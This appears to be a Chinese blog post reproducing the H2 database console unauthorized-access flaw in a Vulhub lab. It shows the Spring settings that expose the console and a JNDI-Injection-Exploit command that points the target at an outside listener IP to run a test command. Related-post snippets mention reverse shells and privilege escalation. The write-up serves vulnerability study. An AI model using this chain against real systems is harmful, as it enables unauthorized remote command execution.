H2database-未授权访问漏洞复现

已于 2022-07-01 11:42:21 修改
阅读量2.6k 收藏 3
点赞数
分类专栏: 漏洞复现 文章标签: 安全 网络安全 web安全
于 2022-06-29 17:05:17 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45366453/article/details/125525496
版权
漏洞描述
产生原因
环境搭建
漏洞复现

漏洞描述

H2 database是一款Java内存数据库,多用于单元测试。

默认端口:20051

产生原因

H2 database自带一个Web管理页面,在Spirng开发中,如果我们设置如下选项,即可允许外部用户访问Web管理页面,且没有鉴权:

spring.h2.console.enabled=true
spring.h2.console.settings.web-allow-others=true

利用这个管理页面,我们可以进行JNDI注入攻击,进而在目标环境下执行任意命令。

环境搭建

执行如下命令启动一个Springboot + h2database环境:

docker-compose up -d

启动后,访问http://your-ip:8080/h2-console/即可查看到H2 database的管理页面。

在这里插入图片描述

漏洞复现

  1. 下载JNDI-Injection-Exploit

    https://github.com/welk1n/JNDI-Injection-Exploit

  2. 生成执行RMI Payload-URL

    java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C touch /tmp/success -A 49.232.65.159

在这里插入图片描述

  1. 填入URL提交执行,点击连接

在这里插入图片描述

在这里插入图片描述

  1. 总结

    通过JDBC URL地址远程加载exp,java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C touch /tmp/success -A 49.232.65.159作用就是开启监听并执行命令,-C为执行的命令,-A为监听机的ip地址

参考链接

Vulhub - Docker-Compose file for vulnerability environment

4_Seasons
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【实战系列4】H2 Database Console授权访问/命令执行漏洞到msf内网提权渗透
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
04-13 1260
通过H2Database Console的命令执行漏洞,结合windows的powershell反弹shell,再利用msf提权并开启rdp服务,在管理员修改了默认的rdp端口3389的情况下,利用命令找到真正的rdp服务端口,远程连接控制目标主机。
H2 Database Console授权访问漏洞复现+利用
0xSec
04-08 1700
H2 database是一款Java内存数据库,多用于单元测试。利用这个管理页面,我们可以进行JNDI注入攻击,进而在目标环境下执行任意命令。
数据库应用-H2database--授权访问&命令执行漏洞
XXokok的博客
11-26 457
数据库应用-H2database--授权访问&命令执行漏洞
授权访问:Hadoop 授权访问漏洞
最新发布
qq_68163788的博客
05-20 962
Hadoop是一个由Apache基金会所开发的分布式系统基础架构,由于服务器直接在开放了 Hadoop 机器 HDFS 的 50070 web 端口及部分默认服务端口,黑客可以通过命令行操作多个目录下的数据,如进行删除,下载,目录浏览甚至命令执行等操作,产生极大的危害。
数据库安全-H2 database&Elasticsearch&CouchDB&Influxdb漏洞复现
rumil的博客
10-14 986
Apache CouchDB是一个开源的面向文档的NoSQL数据库,用Erlang实现。它使用JSON来存储数据,使用MapReduce使用JavaScript作为查询语言,使用HTTP作为API。在用户开启了认证, 但设置参数 shared-secret 的情况下,jwt 的认证密钥为空字符串,此时攻击者可 以伪造任意用户身份在 influxdb 中执行 SQL 语句。利用这个管理页面,我们可以进行 JNDI 注入攻击,进而在目标环境下执行任意命令。将生成出来的所提供的服务,输入到界面当中,进行连接。
H2 Database Console授权访问
zzzzz1284的博客
01-06 933
H2 Database Console授权访问
H2db console 授权访问RCE 漏洞复现+利用(CVE-2022-23221)
0xSec
02-21 2695
H2 数据库控制台中的另一个经身份验证的 RCE 漏洞,在 v2.1.210+ 中修复。2.1.210 之前的 H2 控制台允许远程攻击者通过包含 IGNORE_UNKNOWN_SETTINGS=TRUE;INIT=RUNSCRIPT 子字符串的 jdbc:h2:mem JDBC URL 执行任意代码。
H2Database-SQL.rar_H2Database-SQL语法_h2database 语法_h2database详解
09-24
H2Database是一款开源、轻量级、内存模式的数据库管理系统,它支持多种SQL标准,包括SQL:2003、SQL:2008和部分SQL:2011。这款数据库广泛应用于测试、开发以及嵌入式系统,因为它的易用性、高性能和灵活性。在"**H2...
H2Database-SQL语法.pdf
05-04
H2数据库是一个开源的关系型数据库。H2是一个嵌入式数据库引擎,采用java语言编写,不受平台的限制,同时支持网络版和嵌入式版本,有比较好的兼容性,支持相当标准的sql标准,支持集群。
spring-boot-h2-database-example
04-12
原始软件包名称'com.javatpoint.spring-boot-h2-database-example'无效,并且该项目改用'com.javatpoint.springbooth2databaseexample'。 入门 参考文件 有关更多参考,请考虑以下部分: 导游 以下指南说明了如何...
H2database + MyBatis-Plus SSM.zip
08-20
在本项目中,"H2database + MyBatis-Plus SSM.zip" 是一个整合了H2数据库、MyBatis-Plus以及Spring、SpringMVC和MyBatis(简称SSM)框架的示例应用。这个压缩包包含了构建一个简单但功能齐全的Java Web应用程序所需...
H2 Database(H2内存数据库)
08-15
2、h2-1.3.173.jar (截止2013-8-15最新的H2.jar) 3、h2-2013-07-28.zip (截止2013-8-15最新的H2服务,包括API\JAR\服务) 4、H2Database_SQL语法.doc 5、H2Database高级特性.doc 6、H2Database聚合函数.doc 7、H2...
漏洞复现Influxdb,H2database,couchDB,ElasticSearch
m0_63917373的博客
11-30 1491
漏洞复现Influxdb,H2database,couchDB,ElasticSearch vulhub vulfocus
H2 Database Console 授权访问复现
锋刃科技的博客
01-22 2254
漏洞概述 H2 database是一款Java内存数据库,多用于单元测试。H2 database自带一个Web管理页面,在Spirng开发中,如果我们设置如下选项,即可允许外部用户访问Web管理页面,且没有鉴权: spring.h2.console.enabled=true spring.h2.console.settings.web-allow-others=true 利用这个管理页面,我们可以进行JNDI注入攻击,进而在目标环境下执行任意命令。 环境搭建 使用vulhub来安装...
服务攻防-数据库安全&Redis&CouchDB&H2database&授权访问&CVE漏洞
zyw268的博客
05-06 272
数据库应用-H2database--授权访问&CVE漏洞。数据库应用-Couchdb-授权越权&CVE漏洞。数据库应用-Redis-授权访问&CVE漏洞
Hadoop&hbase监控页面授权访问漏洞处理方案验证过程实现
weixin_42621434的博客
10-29 9061
Hadoop&hbase监控页面授权访问漏洞处理方案验证 Hadoop:监控页面授权登录配置步骤: 1 页面弹出框授权 1.1页面弹出框授权配置 1.上传附件的jar包hadoop-http-auth-e3base.jar到$HADOOP_HOME/share/hadoop/common目录下 并分发到另外两台主机 2.修改$HADOOP_HOME/etc/hadoop/core-sit...
服务攻防-数据库安全-Influxdb&H2database&CouchDB&ElasticSearch数据库漏洞复现
ran的博客
05-07 2340
默认端口:InfluxDB 是一个开源的时间序列数据库,旨在处理大规模数据处理和分析的高写入和查询负载。它针对实时存储和查询大量时间戳数据进行了优化。InfluxDB 提供了一种类似 SQL 的查询语言称为 InfluxQL,允许用户从数据库中检索和操作数据。它还支持各种客户端库和插件,以与其他数据源和工具集成。InfluxDB 的一些主要特点包括:高写入和查询性能:InfluxDB 优化了高吞吐量数据摄取和检索,非常适合实时数据处理和分析。
服务攻防——数据库安全授权访问、弱口令
m0_61506558的博客
12-14 520
关于判断服务是否开放进行信息收集的内容,可能通过扫描工具,如果遇到WAF的话,通过常用搭建网站的组件进行尝试,或者通过特定服务提供的报错信息进行判断......由于基于 Erlang 的 JSON 解析器和基于 JavaScript 的 JSON 解析器的差异,在 1.7.0 之前的 Apache CouchDB 和 2.1.1 之前的 2.x 中,可以提交_users具有重复键的文档,roles用于数据库内的访问控制,包括特例_admin角色,表示管理用户。
漏洞分析|Metabase 代码执行漏洞(CVE-2023-38646):H2 JDBC 深入利用
m0_46699477的博客
07-28 1835
利用 TRIGGER + DefineClass 完整的实现了 JAVA 代码执行和漏洞回显。
xdma h2c-_test
07-04
### 回答1: xdma h2c-_test是一种通信接口协议,用于在数据传输过程中将数据从主机传输到外设。其中,xdma代表可扩展的直接内存访问(eXtended Direct Memory Access),用于提供高性能的数据传输,而h2c代表从主机到外设(Host to Card)的传输方式,_test表示这是一个测试版本。 在使用xdma h2c-_test协议时,主机可以通过直接内存访问技术将数据从主机内存传输到外设(如显卡、网络接口卡等)。这种方式能够提供高带宽和低延迟的数据传输,适用于需要快速处理大量数据的应用场景。 xdma h2c-_test协议的实现可能需要通过特定的驱动程序和软件库来完成,这些软件工具可以帮助主机与外设进行通信和数据传输。用户可以根据具体需求配置传输的参数,如传输方向、数据大小、起始地址等。 需要注意的是,xdma h2c-_test通常为测试版本,可能存在一些局限性或不稳定的问题。因此,在实际应用中,建议使用更稳定和成熟的版本来确保数据传输的可靠性和性能。 总之,xdma h2c-_test是一种用于高性能数据传输的通信接口协议,适用于需要快速传输大量数据的应用场景,并且可以通过特定的驱动程序和软件库来实现。 ### 回答2: xdma h2c-_test 是一种数据传输协议,它在计算机之间传输数据时使用。具体来说,xdma表示通过DMA(直接内存访问)引擎进行数据传输,而h2c表示从主机(host)到协处理器(co-processor)的数据传输,-test则表示这是一种用于测试的传输方式。 在计算机系统中,DMA引擎可以在主机和协处理器之间直接传输数据,而无需CPU的干预。这样可以提高数据传输的效率和性能。xdma h2c-_test 协议就是利用这一特性,提供一种高效的数据传输方式。 通过这种协议,主机可以将数据发送到协处理器,协处理器可以将数据存储在自己的内存中,并进行相应的处理。这种方式在处理大量数据或需要高速传输的应用中非常有用,例如图像处理、信号处理等。 使用xdma h2c-_test协议进行数据传输需要在主机和协处理器之间建立合适的硬件和软件环境,包括配置DMA引擎、编写相应的驱动程序等。通过合理的设置和优化,可以实现数据传输的最佳性能。 总之,xdma h2c-_test是一种用于测试的数据传输协议,通过利用DMA引擎实现主机到协处理器的高效数据传输。它在处理大量数据和需要高速传输的应用中具有重要的作用。 ### 回答3: xdma h2c-_test是一个Xilinx设计工具中的一个核心功能,用于进行高性能数据传输。xdma代表跨域DMA,是一种用于在不同的处理器之间高速传输数据的技术。h2c-_test则代表从主机(Host)到片上设备(FPGA)的数据传输测试。 在FPGA设计中,数据传输是一个非常重要的任务,特别是在高性能计算和数据处理领域。xdma h2c-_test提供了一种简单而有效的方法来测试FPGA系统的数据传输性能。 通过xdma h2c-_test,我们可以将数据从主机传输到FPGA中的特定逻辑模块。这个测试可以帮助我们评估数据传输的吞吐量、延迟以及系统的稳定性。 xdma h2c-_test的实现通常需要以下步骤: 1. 配置主机和FPGA之间的数据通道(此处为h2c)。 2. 在主机上编写相应的测试程序,用于生成测试数据,并将其通过h2c通道发送到FPGA。 3. 在FPGA上编写接收数据的逻辑,并进行数据处理或存储。 4. 在测试过程中,可以记录数据传输的性能指标,例如传输速度和延迟。 5. 根据测试结果,可以根据需要进行性能优化或修改设计。 综上所述,xdma h2c-_test是一种用于测试主机到FPGA的高性能数据传输性能的工具。通过该工具,我们可以评估FPGA系统的数据传输性能,并根据测试结果进行性能优化。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值